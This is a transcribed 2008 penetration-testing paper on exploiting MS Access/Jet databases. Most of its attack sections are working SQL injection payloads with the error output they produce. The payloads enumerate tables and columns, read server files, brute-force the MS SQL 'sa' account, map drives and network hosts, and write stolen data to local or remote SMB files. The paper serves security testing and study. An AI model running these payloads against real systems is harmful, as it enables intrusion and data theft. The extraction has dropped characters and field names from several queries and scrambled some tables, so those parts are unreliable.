:: RESEARCH PAPER :: ACCESS THROUGH ACCESS
|
|
|
- Chrystal Carroll
- 10 years ago
- Views:
Transcription
1 :: RESEARCH PAPER :: ACCESS THROUGH ACCESS Version 1.1, May 2008 Brett Moore, Network Intrusion Specialist INSOMNIA SECURITY
2 Contents 1. Introduction MS Access Default Tables Determining The Version Of Access Database Determining The Database Engine Database Connection Strings Jet Versions Jet File and Service Pack Versions Operating System Installed Versions Components That Install Unsafe Versions of MS Jet Relevant MS 4.0 Jet Security Notices SandBoxing How SandBoxing Works Safe Functions Determining If SandBoxing Is Enabled Inline Evaluation With The Pipe Character Standard SQL Injection Retrieving Information The Sample Vulnerable Query Table Enumeration Column Number Enumeration Column Enumeration Column Data Type Enumeration Accessing External Databases Reading Local Files Connecting To MS SQL Mapping The Local Drive Writing To Files Operating System Commands Non SQL MS Jet Exploitation References October 2008 Page 2 of 26
3 1. Introduction MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test. The aim of this paper is to bring a lot of disparate information together into one guide. MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage. Therefore is often encountered during Web Application reviews and the potential for exploitation should be realised. This paper will outline methods to identify different versions of MS Jet, some SQL Injection methods to use during tests, and some other techniques to access files, servers, and potentially gain command access. 7 October 2008 Page 3 of 26
4 2. MS Access Default Tables Access databases contain a number of hidden/system tables. These can be viewed through MS Access by checking the relevant options on the view tab of the tools menu. To obtain a list of tables contained within the database, from within MS Access, execute the following query; SELECT Name FROM msysobjects WHERE Type = 1 These tables are generally not accessible through queries external to MS Access. Those that can be accessed are marked under the Query column of the following table. Readable tables are used in the examples within this document and are referenced as <DefaultSystemTable>. Access 97 Table Query Fields MSysAccessObjects X Data, ID MSysACEs MSysModules ACM, FInheritable, ObjectId, SID MSysModules2 X Flags, Form, Module, Name, ReplicationVersion, Type, TypeInfo, Version MSysObjects MSysQueries MSysRelationships Access 2000 Table Query Fields MSysAccessObjects X Data, ID Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szcolumn, szobject, szreferencedcolumn, szreferencedobject, szrelationship MSysAccessXML X ID, LValue, ObjectGuid, ObjectName, Property, Value MSysACEs MSysObjects MSysQueries MSysRelationships Access Table Query Fields ACM, FInheritable, ObjectId, SID Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szcolumn, szobject, szreferencedcolumn, szreferencedobject, szrelationship MSysAccessStorage X DateCreate, DateUpdate, Id, Lv, Name, ParentId, Type MSysAccessXML X ID, LValue, ObjectGuid, ObjectName, Property, Value MSysACEs MSysObjects ACM, FInheritable, ObjectId, SID Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, 7 October 2008 Page 4 of 26
5 MSysQueries MSysRelationships Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szcolumn, szobject, szreferencedcolumn, szreferencedobject, szrelationship Access 2007 Table Query Fields MSysAccessStorage X DateCreate, DateUpdate, Id, Lv, Name, ParentId, Type MSysACEs MSysComplexColumns MSysComplexType_Attachment - MSysComplexType_Decimal - MSysComplexType_GUID - MSysComplexType_IEEEDouble - MSysComplexType_IEEESingle - MSysComplexType_Long - MSysComplexType_Short - MSysComplexType_Text - MSysComplexType_UnsignedByte - ACM, FInheritable, ObjectId, SID ColumnName, ComplexID, ComplexType, ConceptualTableID, FlatTableID MSysNavPaneGroupCategories X Filter, Flags, Id, Name, Position, SelectedObjectID, Type MSysNavPaneGroups X Flags, GroupCategoryID, Id, Name, Object Type, ObjectID, Position MSysNavPaneGroupToObjects X Flags, GroupID, Icon, Id, Name, ObjectID, Position MSysNavPaneObjectIDs X ID, Name, Type MSysObjects MSysQueries MSysRelationships Connect, Database, DateCreate, DateUpdate, Flags, ForeignName, Id, Lv, LvExtra, LvModule, LvProp, Name, Owner, ParentID, RmtInfoLong, RmtInfoShort, Type Attribute, Expression, Flag, LvExtra, Name1, Name2, ObjectID, Order Ccolumn, grbit, icolumn, szcolumn, szobject, szreferencedcolumn, szreferencedobject, szrelationship 7 October 2008 Page 5 of 26
6 2.1. Determining The Version Of Access Database Due to the differences in the accessible default tables, it is possible to determine the version of the database that is been accessed. Version MSysModules2 MSysAccessObjects MSysAccessXML MSysAccessStorage Note: MSysAccessXML is normally empty so is not usable in a union query. The following query can be used to determine if a table exists in the database that is been accessed. If the requested table does not exist, an error is raised. Query: SELECT id FROM users WHERE username ='1' UNION SELECT NULL FROM <TableName> WHERE '1'='1' and password='' Microsoft JET Database Engine (0x80040E37) The Microsoft Jet database engine cannot find the input table or query '<TableName>'. Make sure it exists and that its name is spelled correctly Determining The Database Engine If the database version is 2007 then the database engine in use will be ACE. If errors are displayed then a different error message header will be visible. JET ACE Or Microsoft JET Database Engine [Microsoft][Driver ODBC Microsoft Access] Microsoft Office Access Database Engine 2.3. Database Connection Strings OLEDB Provider=Microsoft.Jet.OLEDB.3.51;Data Source=<path to database> Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<path to database> Provider=Microsoft.ACE.OLEDB.12.0;Data Source=<path to database> ODBC Driver={Microsoft Access Driver (*.mdb)};dbq=<path to database> 7 October 2008 Page 6 of 26
7 3. Jet Versions 3.1. Jet File and Service Pack Versions Filename Version Name Sandbox Msjet35.dll Lower Lower No Msjet35.dll MS Jet 3.51 SP2 No Msjet35.dll MS Jet 3.51 SP3 No Msjet35.dll MS Jet 3.51 SP3 with enhanced security Yes Msjet40.dll MS Jet 4.0 SP3 Yes Msjet40.dll MS Jet 4.0 SP4 Yes Msjet40.dll MS Jet 4.0 SP5 Yes Msjet40.dll MS Jet 4.0 SP5 Yes Msjet40.dll MS Jet 4.0 SP6 Yes Msjet40.dll MS Jet 4.0 SP6 (Windows 2003) Yes Msjet40.dll MS Jet 4.0 SP7 Yes Msjet40.dll MS Jet 4.0 SP8 Yes Msjet40.dll Windows XP SP2 and Security Bulletin MS Yes Msjet40.dll Windows 2003 SP1 and Rollup 1 for Win 2000 SP4 Yes Msjet40.dll Windows Server 2003 SP2 Yes Msjet40.dll Windows Vista Yes Msjet40.dll Windows Vista SP1 Yes ACECORE.DLL Office 2007 (ACE2007) Yes ACECORE.DLL Office 2007 (ACE2007) SP1 Yes ACECORE.DLL Office 2007 (ACE2007) SP1 + Hotfix Yes 3.2. Operating System Installed Versions Operating System Service Pack Jet Version Sandbox Windows NT SP6a (+ Rollup) No Windows 2000 SP Yes Windows 2000 SP Yes Windows 2000 SP Yes Windows 2000 SP4 + Rollup Yes Windows XP Default Yes Windows XP SP Yes Windows XP SP Yes Windows 2003 SP Yes Windows 2003 SP Yes Windows Vista Default Yes 7 October 2008 Page 7 of 26
8 Windows Vista SP Yes The above table shows installed versions on base OS installs, and with different service packs installed. MS Jet and updates are also distributed with other office components, which may or may not affect the accuracy of the results above. If you have other version information, please send to 3.3. Components That Install Unsafe Versions of MS Jet The following components, and lower versions, are known to install MS Jet 3.51 or lower. This will not have sandboxing enabled, and manual updates are required to install SP3. MS Jet 3.51 is no longer supported. Microsoft Open Database Connectivity Driver for Access 3.5 Microsoft Access 95 Standard Edition Microsoft Access 97 Standard Edition Microsoft Office 97 Professional Edition Microsoft Visual Studio 6.0 Newer versions of the components install MS Jet 4.0 and greater Relevant MS 4.0 Jet Security Notices Date April 13, 2004 Link Affects All Microsoft Jet Database Engine version 4.0 prior to Notes This was the last security update directly related MS Jet 4.0 Date March 21, 2008 Link Affects All Microsoft Jet Database Engine version 4.0 prior to Notes Apparently doesn t affect Windows Server 2003 Service Pack 2, Windows Vista, and Windows Vista Service Pack 1. It appears that Microsoft have finally realised the requirement to issue a patch for known vulnerabilities in MS Jet 4.0. Numerous buffer overflow issues have been reported in MS Jet 4.0, including; 31 Mar Microsoft Jet DB engine vulnerabilities 16 Nov Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability 13 Feb or so mdb files that will crash Microsoft Access These have not been addressed because according to Microsoft the.mdb file extension is an unsafe file type, and therefore does not receive security updates. This is not a full list of vulnerabilities affecting MS Jet, but are the ones relevant to current versions. 7 October 2008 Page 8 of 26
9 4. SandBoxing Sandboxing mode prevents the use of unsafe VBA functions. The following registry key is created after installing the relevant version of service pack. Service Pack 3 for MS Jet 3.51 \\HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\3.5\engines\SandboxMode Service Pack 3 for MS Jet 4.0 \\HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\engines\SandboxMode ACE 2007 \\HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Access Connectivity Engine\Engines\SandboxMode The settings for this registry key are Setting Description 0 Sandbox mode is disabled at all times. 1 Sandbox mode is used for Access applications, but not for non-access Applications. 2 (default) Sandbox mode is used for non-access applications, but not for Access Applications. 3 Sandbox mode is used at all times How SandBoxing Works There are two functions related to Sandboxing that are relevant. DetermineRegSandBoxMode Note: ACE 2007 sets the default value to 3. DetermineRegSandBoxMode is called when the engine is initialised. It first checks the SandBoxMode registry key, and then dependant on that setting, checks to see if the module msaccess.exe is loaded. The result of this function is stored for later reference by the function IsInSandboxMode. File Msjtes40.dll (Windows 2003 MSJet40.dll ) Function CJetESInstance::DetermineRegSandBoxMode 1B808FBE 55 PUSH EBP 1B808FBF 8BEC MOV EBP,ESP 1B808FC1 83EC 20 SUB ESP,20 1B808FC4 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX 1B808FC7 C745 F MOV DWORD PTR SS:[EBP-C],2 1B808FCE 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 1B808FD2 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 1B808FD5 50 PUSH EAX 1B808FD B PUSH msjtes40.1b ; ASCII "SOFTWARE\Microsoft\Jet\4.0\Engines" 1B808FDB PUSH B808FE0 FF B CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>] 1B808FE6 85C0 TEST EAX,EAX 1B808FE JNZ SHORT msjtes40.1b80902d 1B808FEA C745 E MOV DWORD PTR SS:[EBP-18],4 1B808FF1 8D45 E8 LEA EAX,DWORD PTR SS:[EBP-18] 1B808FF4 50 PUSH EAX 1B808FF5 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 7 October 2008 Page 9 of 26
10 1B808FF8 50 PUSH EAX 1B808FF9 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 1B808FFC 50 PUSH EAX 1B808FFD 6A 00 PUSH 0 1B808FFF 68 C094801B PUSH msjtes40.1b8094c0 ; ASCII "SandBoxMode" 1B FF75 EC PUSH DWORD PTR SS:[EBP-14] 1B FF B CALL DWORD PTR DS:[<&ADVAPI32.RegQueryValueExA>] 1B80900D 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 1B D F8 00 CMP DWORD PTR SS:[EBP-8],0 1B F85 8E1E0100 JNZ msjtes40.1b81aea8 1B80901A 837D F0 04 CMP DWORD PTR SS:[EBP-10],4 1B80901E 0F85 841E0100 JNZ msjtes40.1b81aea8 1B FF75 EC PUSH DWORD PTR SS:[EBP-14] 1B FF B CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKey>] 1B80902D 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 1B E0 MOV DWORD PTR SS:[EBP-20],EAX 1B D E0 00 CMP DWORD PTR SS:[EBP-20],0 1B F84 8F1E0100 JE msjtes40.1b81aecc 1B80903D 837D E0 01 CMP DWORD PTR SS:[EBP-20],1 1B F84 8E1E0100 JE msjtes40.1b81aed5 1B D E0 02 CMP DWORD PTR SS:[EBP-20],2 1B80904B 0F85 A81E0100 JNZ msjtes40.1b81aef9 1B B PUSH msjtes40.1b ; ASCII "msaccess.exe" 1B FF B CALL DWORD PTR DS:[<&KERNEL32.GetModuleHandleA>] 1B80905C 85C0 TEST EAX,EAX 1B80905E 75 0C JNZ SHORT msjtes40.1b80906c 1B C745 FC MOV DWORD PTR SS:[EBP-4],1 1B B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 1B80906A C9 LEAVE 1B80906B C3 RETN 1B80906C 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 1B ^EB F5 JMP SHORT msjtes40.1b IsSafeVBIntrinsicSW IsSafeVBIntrinsicSW is called when a function is passed in the query. It determines the range of known safe functions to compare against and then calls FindIntrinsic. This function loops through the safe functions checking to find a match for the function passed to it. File Msjtes40.dll (Windows 2003 MSJet40.dll ) Function FindIntrinsic 1B80DEE4 55 PUSH EBP 1B80DEE5 8BEC MOV EBP,ESP 1B80DEE7 83EC 10 SUB ESP,10 1B80DEEA 8365 F4 00 AND DWORD PTR SS:[EBP-C],0 1B80DEEE 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 1B80DEF2 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] 1B80DEF5 3B45 10 CMP EAX,DWORD PTR SS:[EBP+10] 1B80DEF8 7F 4C JG SHORT msjtes40.1b80df46 1B80DEFA 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10] 1B80DEFD 2B45 0C SUB EAX,DWORD PTR SS:[EBP+C] 1B80DF00 D1F8 SAR EAX,1 1B80DF02 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 1B80DF05 03C8 ADD ECX,EAX 1B80DF07 894D F4 MOV DWORD PTR SS:[EBP-C],ECX 1B80DF0A 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 1B80DF0D FF3485 E00A831B PUSH DWORD PTR DS:[EAX*4+1B830AE0] 7 October 2008 Page 10 of 26
11 ; Push the pointer into the compare list 1B80DF14 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; Push our function 1B80DF17 E8 19FDFFFF CALL msjtes40.1b80dc35 ; wcsicmp 1B80DF1C 59 POP ECX 1B80DF1D 59 POP ECX 1B80DF1E 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 1B80DF21 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 1B80DF25 7C 0F JL SHORT msjtes40.1b80df36 1B80DF27 837D F8 00 CMP DWORD PTR SS:[EBP-8],0 1B80DF2B 7E 12 JLE SHORT msjtes40.1b80df3f 1B80DF2D 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 1B80DF30 40 INC EAX 1B80DF C MOV DWORD PTR SS:[EBP+C],EAX 1B80DF34 ^EB BC JMP SHORT msjtes40.1b80def2 1B80DF36 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 1B80DF39 48 DEC EAX 1B80DF3A MOV DWORD PTR SS:[EBP+10],EAX 1B80DF3D ^EB B3 JMP SHORT msjtes40.1b80def2 1B80DF3F C745 FC MOV DWORD PTR SS:[EBP-4],1 1B80DF46 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 1B80DF4A 0F84 1DEE0000 JE msjtes40.1b81cd6d 1B80DF50 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 1B80DF54 0F84 48EE0000 JE msjtes40.1b81cda2 1B80DF5A 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 1B80DF5D 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX 1B80DF60 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10] 1B80DF63 C9 LEAVE 1B80DF64 C2 0C00 RETN 0C 4.2. Safe Functions The following list shows the safe functions from Msjtes40.dll (Windows 2003 MSJet40.dll ). Abs Array Asc AscB AscW Atn Cbool Cbyte Ccur Cdate Cdbl Cdec Choose Chr Chr$ ChrB ChrB$ ChrW ChrW$ Cint Clng Csng Cstr Cvar CvDate CvErr Date Date$ Dateadd Datediff Datepart Dateserial Datevalue Day DDB Error Error$ Exp Filter Fix Format Format$ Formatcurrency Formatdatetime Formatnumber Formatpercent Fv Hex Hex$ Hour Iif ImeStatus Instr InstrB InstrRev Int Ipmt Irr IsArray IsDate IsEmpty IsError IsMissing IsNull IsNumeric IsObject Join LBound LCase LCase$ Left Left$ LeftB LeftB$ Len LenB Log LTrim LTrim$ Mid Mid$ MidB MidB$ Minute Mirr Month Monthname Now nper npv Oct Oct$ Partition Pmt Pv Qbcolor 7 October 2008 Page 11 of 26
12 Rate Replace Rgb Right Right$ RightB RightB$ Rnd Round RTrim RTrim$ Second Sgn Sin Sln Space Space$ Split Sqr Str Str$ StrComp StrConv String String$ StrReverse Switch Syd Tan Time Time$ Timer Timeserial Timevalue Trim Trim$ Typename UBound UCase UCase$ Val Vartype Weekday Weekdayname Year Note: The functions marked in orange are considered safe, but can not be called through an SQL query Determining If SandBoxing Is Enabled If sandboxing is enabled then attempting to use of one of the functions that are not in the safe list will cause an error. Query: SELECT id FROM users WHERE username ='1' UNION SELECT cudir() FROM <DefaultSystemTable> WHERE '1'='1' and password='' Microsoft JET Database Engine (0x80040E14) Undefined function 'curdir' in expression. 7 October 2008 Page 12 of 26
13 5. Inline Evaluation With The Pipe Character MS Jet 3.5 As noted in the paper by Matthew Astley and Rain Forest Puppy ( the vertical bar, or pipe character, ( ) could be used in MS Jet 3.5 as an inline evaluation operator. This could be used in any string and would cause the database engine to evaluate the contents before parsing the rest of the query string. Query: MS Jet 4.0 SELECT FROM users WHERE id =' 5+4 ' ; Returns the record with id=9 SELECT FROM users WHERE id =' func() ' ; Will execute func() We have not been able to replicate this with MS Jet 4.0, and can not find any reference material to suggest that it is still available. Error 80040e14 The following error message can be seen in MS Jet 3.5 and MS Jet 4.0. Microsoft JET Database Engine error '80040e14' Invalid use of vertical bars in query expression This error message is caused when the vertical bar is placed outside of surrounding quotes. As an example the following SQL queries will cause the error. Query: SELECT FROM users WHERE id ='' SELECT FROM users WHERE id = October 2008 Page 13 of 26
14 6. Standard SQL Injection 6.1. Retrieving Information The ability to retrieve information through the Jet engine is extremely limited. In the examples that follow information that is displayed through an error is shown as an Error Response message. In all other cases it is assumed that the result of the union query will be displayed by the application in a visible form. For syntax related to Blind SQL Injection have a read of the MS Access SQL Injection Cheat Sheet in the references section. Comments MS Jet does not natively support comments, either inline or line termination. We have seen reports that %00 can be used as a syntax terminator, but we have not been able to reproduce this scenario. We have however noticed the following strange behaviour which can be useful during the creation of a valid SQL statement. Query: SELECT * FROM users WHERE username ='' UNION SELECT 1, 2, FROM <ValidTableName> and password='' or field= and field= The previous SQL statement has one single quote after the supplied table name. If this query is made using MS Access then an error is raised <Invalid Bracketing Of Name>. MS Jet appears to disregard this error and will return the result if the first portion of the query. For this to work the following field comparisons have to be empty, so it cannot be relied on as a method of syntax termination The Sample Vulnerable Query Unless otherwise stated the vulnerable query that is been injected into is SELECT * FROM users WHERE username ='user' and password='pass' Unless otherwise stated the injection will be done into the user field of the query. The techniques used would work against either position, but since injecting into the first position can have syntax issues we chose to use the more difficult position for demonstration purposes Table Enumeration There is no SQL syntax that will return the name of the current table, or the names of other existent tables. The following query can be used in brute force attempts to determine if a table exists in the database that is been accessed. If the requested table does not exist, an error is raised. Query: SELECT * FROM users WHERE username ='1' UNION SELECT NULL FROM <TableName> WHERE '1'='1' and password='' Microsoft JET Database Engine (0x80040E37) The Microsoft Jet database engine cannot find the input table or query '<TableName>'. Make sure it exists and that its name is spelled correctly. 7 October 2008 Page 14 of 26
15 6.4. Column Number Enumeration The ORDER BY clause will accept a numeric value corresponding to the column position in the returned recordset. This can be used to determine the number of columns in the resulting recordset. If the number used in the ORDER BY clause is greater than the number of columns, an error is raised. Replace # in the following query with a sequential count starting at 1. Query: SELECT * FROM users WHERE username ='1' ORDER BY #,'1' and password='' Microsoft JET Database Engine (0x80040E14) The Microsoft Jet database engine does not recognize '#' as a valid field name or expression Column Enumeration Method 1 Vulnerable Query: SELECT id, FROM users WHERE username ='user' and password='pass' This method can be used when the select statement is not using * to specify all fields in the selection. In this scenario the GROUP BY clause can be used to enumerate the columns. Query: SELECT id, FROM users WHERE username ='1' GROUP BY 1 HAVING '1'='1' and password='' Microsoft JET Database Engine (0x80040E21) You tried to execute a query that does not include the specified expression 'id' as part of an aggregate function. The above error message displays the id field, which is then added to the next query. Query: SELECT id, FROM users WHERE username ='1' GROUP BY 1,id HAVING '1'='1' and password='' Microsoft JET Database Engine (0x80040E21) You tried to execute a query that does not include the specified expression ' ' as part of an aggregate function. The above error message displays the field, which is then added to the next query. Query: SELECT id, FROM users WHERE username ='1' GROUP BY 1,id, HAVING '1'='1' and password='' Microsoft JET Database Engine (0x80040E21) You tried to execute a query that does not include the specified expression ''1'='1' and password=''' as part of an aggregate function. The above error message displays an aggregate function error caused by the HAVING statement. It can be deduced that all the columns in the select statement have been found. the next query. Method 2 7 October 2008 Page 15 of 26
16 If the * has been used in the select statement then the GROUP BY clause can not be used, and the following error will be shown if it is attempted. Microsoft JET Database Engine (0x80040E21) Cannot group on fields selected with '*'. In this scenario it is possible to discover one of the column names through the following query. Query: SELECT * FROM users WHERE username ='1' HAVING sum('1')='1' and password='' Microsoft JET Database Engine (0x80040E21) You tried to execute a query that does not include the specified expression 'ID' as part of an aggregate function. The discovery of this column name can help in the next stage, brute forcing, as some applications prefix columns with a standard value eg: fld, t, txt_ Discovery of the other valid column names is through a brute force approach. The following query can be used in brute force attempts to determine if a column exists in the table that is been accessed. If the requested column does not exist, an error is raised. Query: SELECT * FROM users WHERE username ='1' AND <ColumnName> = '1' and password='' Method 3 Microsoft JET Database Engine (0x80040E10) No value given for one or more required parameters. Discovery of the valid column names in other tables, not the one been accessed, is through a brute force approach. The following query can be used in brute force attempts to determine if a column exists in any known table. If the requested column does not exist, an error is raised. Query: SELECT * FROM users WHERE username ='1' UNION SELECT <ColumnName>, NULL, FROM <TableName> WHERE '1'='1' and password='' Microsoft JET Database Engine (0x80040E10) No value given for one or more required parameters Column Data Type Enumeration Column data type enumeration can be done when the returned recordset information is displayed. For this example it is assumed that the first column in the returned recordset is displayed to the user. The ColumnName and TableName are also required. The TypeName() function will return a text value determining the type of data stored in the column. Query: SELECT * FROM users WHERE username ='1' UNION SELECT TypeName(<ColumnName>),NULL FROM <TableName> WHERE '1'='1' OR '1'='1' and password='' 7 October 2008 Page 16 of 26
17 The data contained in the columns of the database is never displayed in error messages. Data enumeration can be done through using a union to display the data, or through blind SQL injection. 7 October 2008 Page 17 of 26
18 7. Accessing External Databases MS Jet provides the ability to retrieve data from databases external to the current database. This is done using the IN clause within the FROM syntax of a select statement. Query: SELECT id FROM users WHERE username ='1' UNION SELECT id FROM <table> IN '<path to database>' WHERE '1'='1' and password='' Data from a remote database that is accessible through an SMB or WEBDAV share can be accessed if the network allows it. ISAM Connections Non access database can be opened by specifying the database type in either of the following formats;... FROM Table IN "" [<Type>; DATABASE=<Path To Database>;];... FROM Table IN "<Path To Database>" "Type"... FROM [<Type>;DATABASE=<Path To Database>].[<Table>] The available types to access database types other than access are listed under the following registry key; OR HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Jet\4.0\ISAM Formats HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Access Connectivity Engine\ISAM Formats The ISAM connections use the engines listed under the respective \Engine registry key. ODBC Connections ODBC connections can be made using the following format;... FROM [ODBC; DRIVER=<Driver>] Available ODBC connection types are listed under the following registry key; HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBCINST.INI MS Jet will not allow ODBC connections to MS Access drivers; it expects you to use the ISAM. Generic Connection Errors Microsoft JET Database Engine error ' ' Could not find installable ISAM. Reason: The specified ISAM is not installed, or it has been spelt incorrectly. Microsoft JET Database Engine error ' ' You cannot use ODBC to import from, export to, or link an external Microsoft Jet or ISAM database table to your database. Reason: You tried to use ODBC to open a MS Jet connection. 7 October 2008 Page 18 of 26
19 7.1. Reading Local Files The TEXT ISAM engine can be used to read to read a limited number of file types. The allowed file extensions are listed under the DisabledExtensions value of the TEXT engine registry key. By default the following file extensions can be accessed; txt,csv,tab,asc,tmp,htm,html The TOP clause is used to enumerate through the lines of the file. The data will be returned in the last column of the recordset, and will need to be displayed by the application to be visible. Replace # in the following query with a sequential count starting at 1. Query: SELECT id FROM users WHERE username ='1'and password='' UNION SELECT TOP # * FROM [TEXT;DATABASE=<Directory Path>;HDR=NO;FMT=Delimited].[<FileName>] WHERE '1'='1' OR '1'='1' Excel spreadsheets can be accessed using a similar query; Query: SELECT id FROM users WHERE username ='1'and password='' UNION SELECT TOP # * FROM [Excel 8.0;DATABASE=<Full File Path>;HDR=NO].[Sheet1$] WHERE '1'='1' OR '1'='1' Common Errors Microsoft JET Database Engine error '80040e09' Cannot update. Database or object is read-only. Reason: The file exists but is not a valid file extension. Microsoft JET Database Engine error '80040e10' No value given for one or more required parameters. Reason: The SQL statement ends with a WHERE clause that contains a column name. To get around this, try to inject into the last portion of the WHERE clause. Microsoft JET Database Engine error ' ' '<Directory Path>' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides. Reason: The path specified in the query does not exist or is not accessible by this user. Microsoft JET Database Engine error '80040e37' The Microsoft Jet database engine could not find the object '<FileName>'. Make sure the object exists and that you spell its name and the path name correctly. Reason: The file specified in the query does not exist or is not accessible by this user. 7 October 2008 Page 19 of 26
20 7.2. Connecting To MS SQL A SQL SERVER ODBC connection can be used to connect to a network accessible MS SQL instance. By making multiple connection attempts this can be used to brute force the sa, or other, user account. Query: SELECT id FROM users WHERE username ='1'and password='' UNION SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=<Server>,<Port>;UID=sa;PWD=<PASSWORD>; DATABASE=master].Information_Schema.Tables where '1'='1'or'1'='1' Microsoft JET Database Engine error ' ' ODBC--connection to 'SQL SERVER<Server>' failed. Reason: If there is a long delay before this error is returned then there is no SQL instance listening at that address. Microsoft JET Database Engine error ' ' ODBC--connection to 'SQL SERVER<Server>' failed. Reason: If there is a short delay before this error is returned then the supplied password is incorrect, or the specified user does not exist. Trusted Connections An ODBC connection can be used specifying the Trusted Connection mode, which usually gives access under the PUBLIC role. If the application makes use of Integrated Security, which implies that the account that the application is running under has access to the SQL Server, then access may be available to the database used by the vulnerable application (in cases where both MS SQL and Access databases are used.) Query: SELECT id FROM users WHERE username ='1'and password='' UNION SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=<Server>,<Port>; DATABASE=master; Trusted_Connection=Yes].Information_Schema.Tables where '1'='1'or'1'='1' 7 October 2008 Page 20 of 26
21 7.3. Mapping The Local Drive The IN clause of a select statement can be used to detect the presence of directories and files. This query can be used to find the system drive. Query: SELECT id FROM users WHERE username ='1' UNION SELECT * FROM test IN '. ' WHERE '1'='1' and password='' Microsoft JET Database Engine error ' ' The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data This query can be used to detect directories and files. Query: SELECT id FROM users WHERE username ='1' UNION SELECT id FROM test IN '<path to file>' WHERE '1'='1' and password='' Microsoft JET Database Engine error ' ' Unrecognized database format 'c:\temp\file.txt'. Reason: The file exists, but is not a valid database. Microsoft JET Database Engine error ' ' Could not find file 'c:\temp\nofile.txt'. Reason: The file does not exist. Microsoft JET Database Engine error ' ' 'c:\nopath\nofile.txt' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides. Reason: The directory does not exist. Microsoft JET Database Engine error ' ' The Microsoft Jet database engine cannot open the file 'c:\temp'. It is already opened exclusively by another user, or you need permission to view its data. Reason: You attempted to open a directory, which exists. Mapping the Network The same query can be used to attempt opening an SMB connection on another machine, allowing for simple mapping of windows machines on the accessible network. 7 October 2008 Page 21 of 26
22 7.4. Writing To Files MS Jet can be used to write to files, with similar restrictions to 7.1, but this cannot be done within a UNION or sub select. It can only be done if the injection is into the COLUMN portion of the initial select statement. Text ISAM Query: SELECT text to write into [TEXT;DATABASE=<Directory Path>; HDR=NO;FMT=Delimited].[<FileName>] FROM users WHERE username='name' and password='pass' If the conditions in the WHERE portion of the syntax return TRUE then the text will be written to the file. If the conditions return FALSE, then the file will be created but will not have the text written to the file. text to write can be replaced with any valid column name, including *, to pull data out of the database to a local, or remote (SMB), file. The allowed file extensions are listed under the DisabledExtensions value of the TEXT engine registry key. By default the following file extensions can be accessed; txt,csv,tab,asc,tmp,htm,html Similar type of data retrieval can be done using other formats such as EXCEL. Query: SELECT text to write into [Excel 5.0;DATABASE=<Full File Path>; HDR=NO;FMT=Delimited].[Sheet1$] FROM users WHERE username='name' and password='pass' Database File Results from a query can also be written to a new table in an existing database. This can be used to create a new table in the current database, or to retrieve datasets to a new table in an existing local, or remote, database. Query: SELECT * into <TableName> in '<Path To Database>' FROM users WHERE username='name' and password='pass' 7 October 2008 Page 22 of 26
